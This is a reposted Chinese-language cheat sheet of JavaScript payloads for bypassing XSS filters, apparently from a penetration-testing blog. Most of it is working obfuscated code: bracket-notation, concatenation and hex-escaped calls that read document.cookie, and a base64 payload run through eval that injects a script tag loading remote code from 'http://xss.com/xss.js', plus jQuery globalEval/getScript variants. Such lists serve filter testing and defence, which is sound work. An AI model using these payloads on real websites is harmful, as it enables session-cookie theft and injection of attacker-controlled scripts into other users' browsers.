碼上快樂

相關內容    簡體    繁體

各種變異繞過XSS過濾器

本文轉載自   查看原文   2019-08-02 12:39   942    滲透測試/ 網絡安全

各種變異繞過XSS過濾器(Various variations bypass the XSS filter )

文章來自:https://www.cnblogs.com/iAmSoScArEd/p/11287928.html  我超怕的

 

利用window等來操縱會被認為是全局變量 window.self 與self同樣效果

1、window

window["document"]["cookie"] //代替document.cookie

2、window

window['alert'](["document"]["cookie"]); //代替 alert(document.cookie)

3、self

self["alert"]("123xss") ;//代替傳統alert

4、注釋

(/*hello*/self/*safe*/)[/*no*/"alert"/*alarm*/]("123xss") ;//代替傳統alert

5、利用拼接( self替換成window同樣效果)

self["ale"+"rt"](self["doc"+"ument"]["coo"+"kie"]) ;//代替傳統alert

6、利用十六進制( self替換成window同樣效果)

self["\x61\x6c\x65\x72\x74"](

   self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]

       ["\x63\x6f\x6f\x6b\x69\x65"]

)   //alert(document.cookie)
 
        
 
        
7、利用BASE64( self替換成window同樣效果)
 
        
 
         
self["\x65\x76\x61\x6c"]( //eval

  self["\x61\x74\x6f\x62"]( //atob   base-64解碼方法,base-64 編碼使用方法是 btoa()

 "dmFyIGhlYWQgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCk7dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3NjcmlwdC5zZXRBdHRyaWJ1dGUoJ3R5cGUnLCAndGV4dC9qYXZhc2NyaXB0Jyk7c2NyaXB0LnNldEF0dHJpYnV0ZSgnc3JjJywgJ2h0dHA6Ly94c3MuY29tL3hzcy5qcycpO2hlYWQuYXBwZW5kQ2hpbGQoc2NyaXB0KTs=")

)//var head = document.getElementsByTagName('head').item(0);var script = document.createElement('script');script.setAttribute('type', 'text/javascript');script.setAttribute('src', 'http://xss.com/xss.js');head.appendChild(script);
 
        
 
         
         
        
8、利用JQuery
 
        
 
         
1) self["$"]["globalEval"]("alert(123)");  //alert(123)

2) self["\x24"](//$

  self["\x67\x6c\x6f\x62\x61\x6c\x45\x76\x61\x64"]//globalEval

  ["\x61\x6c\x65\x72\x74\x28\x31\x32\x33\x29"] //alert(123)
)
 
3) self["$"]["getScript"](url). getScript //從url獲取js腳本
 
        
 
        
9、利用Object.keys
 
        
 
         
 a=0; for(i in self) { if(i == "alert") { console.log(a); } a++; } //獲取alert在數組中的位置
 self[Object.keys(self)[7]]("123") // 假設通過上述代碼執行結果為7  執行效果:alert("123")
 
        
 
        
 
 
        
 
         
//如果不允許我們使用“alert”字符串,並且上面的方法都不能使用,
//我們如何找到“alert”索引號呢?JavaScript可以很好的解決這個難題。
//我們要做的就是為變量(a)分配一個函數,該函數迭代self並找到警報索引號。
//然后,我們可以使用test()來查找帶有正則表達式的“alert”,如^a[rel]+t$:

a = function() {
    c=0; 
    for(i in self) {
        if(/^a[rel]+t$/.test(i)) return c;
        c++;
    }
}

a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}}
self[Object.keys(self)[a()]]("123")   // alert("123")
 
        
 
         
         
        
以上思路來自 嘶吼。
 
       
 
        
       
 
        
 
 
       
 
        
       
 
       
 
      
 
      
 
      
 
     
 
     
 
      
 
      
 
        
       
免責聲明!
 
       
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。
 
      
 
      

      
 
     
 
    
 
     
    
 
     
 
      猜您在找 
        WAF指紋識別和XSS過濾器繞過技巧  
        springboot 防xss攻擊過濾器  
        防XSS攻擊過濾器  
        Chrome和IE的xss過濾器分析總結  
        防止xss(腳本攻擊)的方法之過濾器  
        XSS漏洞修復----過濾器(親測可用)  
        Chrome忽略證書錯誤與關閉XSS過濾器  
        XSS過濾繞過總結  
        xss的變形--如何繞過xss過濾  
        XSS過濾的繞過  
      
 
      
 
     
 
    
 
   
 
  
 
  

    
  
 
  
 
   
 
   
 
   
 
    粵ICP備18138465號  
    © 2018-2025 CODEPRJ.COM